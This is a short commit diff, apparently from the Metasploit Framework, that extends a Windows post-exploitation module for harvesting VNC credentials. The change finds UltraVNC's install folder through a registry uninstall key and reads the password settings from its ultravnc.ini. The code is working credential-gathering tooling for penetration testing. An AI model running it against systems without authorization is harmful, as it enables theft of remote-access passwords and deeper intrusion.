Land #6563, VNC creds scraper uninstall location

modules/post/windows/gather/credentials/vnc.rb

@@ -108,6 +108,20 @@ class Metasploit3 < Msf::Post
         :port_variable => 'PortNumber='}
     end
 
+    #check uninstall key
+    begin
+      root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1")
+      open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
+      vnclocation = open_key.query_value("InstallLocation").data
+      locations << {:name => 'UltraVNC',
+        :check_file => vnclocation + "\\ultravnc.ini",
+        :pass_variable => 'passwd=',
+        :viewonly_variable => 'passwd2=',
+        :port_variable => 'PortNumber='}
+    rescue Rex::Post::Meterpreter::RequestError => e
+      vprint_error(e.message)
+    end
+
     locations << {:name => 'WinVNC3_HKLM',
       :check_reg => 'HKLM\\Software\\ORL\\WinVNC3',
       :pass_variable => 'Password',